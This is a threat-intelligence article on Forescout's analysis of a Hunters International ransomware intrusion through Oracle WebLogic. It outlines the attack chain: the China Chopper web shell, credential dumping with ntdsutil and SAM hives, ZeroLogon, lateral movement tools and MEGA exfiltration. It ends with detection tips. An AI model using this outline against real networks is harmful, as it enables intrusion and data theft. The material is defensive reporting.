Insights of a Hunters International Intrusion from Oracle WebLogic

An intrusion involving Hunters International, a ransomware-as-a-service (RaaS) group, was observed between July and September 2024, during which the group compromised an organization by exploiting an Oracle web server for initial access, as identified by Forescout. The ransomware group’s primary motivation is financial gain, with its global impact predominantly centered in the United States, the most affected region since the group emerged in October 2023. Detailing the group’s operations, Forescout threat researchers Sai Molige and Prashant Tilekar noted, "In November 2024 alone, the group claimed 24 victim organizations — for an average of nearly one per day." Victim tracking identified a total of 245 affected organizations as of the January 9, 2025 report, with 129 victims in the United States, followed by 14 in the United Kingdom and 11 in Canada. The group has targeted a diverse range of industries, including automotive, healthcare, manufacturing, education, financial services, food, and logistics. Connections within the cybercrime ecosystem revealed coding similarities with Hive ransomware and affiliations with Snatch ransomware, along with ties to ALPHV/BlackCat and LockBit.

Forescout’s detailed examination of the group’s tactics, techniques, and procedures (TTPs) during observed intrusions summarizes an attack chain that begins with exploiting the Oracle WebLogic debug port (8453) to deploy the China Chopper web shell for persistence and command execution. Initial reconnaissance was performed using basic tools such as "whoami," "ipconfig," and "nltest" to gather system and network details, while "dsquery" facilitated domain enumeration to map trust relationships. Credential access was achieved through system and SAM hive dumps, followed by registry save operations to extract sensitive data. Lateral movement was conducted using tools like Plink, Impacket, RDP, ncat, and AnyDesk. Database servers were targeted with "xp_cmdshell" to dump database content via "mysqldump." Before deploying ransomware, the attackers disabled security measures like Data Execution Prevention (DEP) and firewalls and deleted shadow copies to hinder recovery efforts.

Further insights revealed additional TTPs that complemented the summarized attack steps. The attackers initiated their campaign by deploying renamed AutoIT malware, leveraging it for reconnaissance and lateral movement. Privilege escalation was achieved through the exploitation of the ZeroLogon vulnerability (CVE-2020-1472), while Oracle WebLogic CVE-2020-14644 was exploited for initial access, a vulnerability previously identified as a Known Exploited Vulnerability (KEV) by CISA. Forescout highlighted process activity associated with Java, particularly when spawning suspicious child processes. "The attackers connected to the Oracle WebLogic debug port (8453), using java.exe to execute commands and install the China Chopper web shell for persistence," Forescout reported. Credential theft activities included registry modifications and saving results to a text file, with attackers dumping the Active Directory database using "ntdsutil" commands such as "ifm" to create full dumps. Lateral movement leveraged tools like SMB, RDP, Plink, Impacket, AnyDesk, and TeamViewer. Activity on Linux hosts involved parsing and filtering the "/etc/passwd" file to enumerate user accounts and privileges. Malicious actions extended to database servers, where "xp_cmdshell" and "mysqldump" were used to extract sensitive data. Data exfiltration was performed using the MEGA file-sharing platform.

Forescout provided several critical hunting tips to detect and mitigate activities associated with Hunters International. Baseline monitoring of account usage, RDP connections, enumeration activity, and large outbound data transfers is essential. Key indicators include AnyDesk usage via the command line, SSH tunneling with Plink on non-standard ports, and Impacket activity, which should be analyzed through SMB traffic patterns, service creation events, and authentication logs. Monitoring SMB traffic for hidden share creation and RPC activity can provide insights into lateral movement. Parent-child process relationships, particularly Java-spawning child processes like cmd.exe, should also be scrutinized. RMM tools such as AnyDesk and TeamViewer require validation due to their prevalent use, with particular attention to unauthorized installations. It is also advisable to track scheduled tasks and Windows events related to task creation, alongside registry changes and file creation in the "System32\Tasks" folder. To address protocol abuse and lateral movement, Forescout emphasized monitoring sequential RPC connections, hidden SMB shares, and large-scale file transfers via SMB. The use of tunneling tools like Plink, deviations in command-line patterns, and unauthorized remote desktop sessions were noted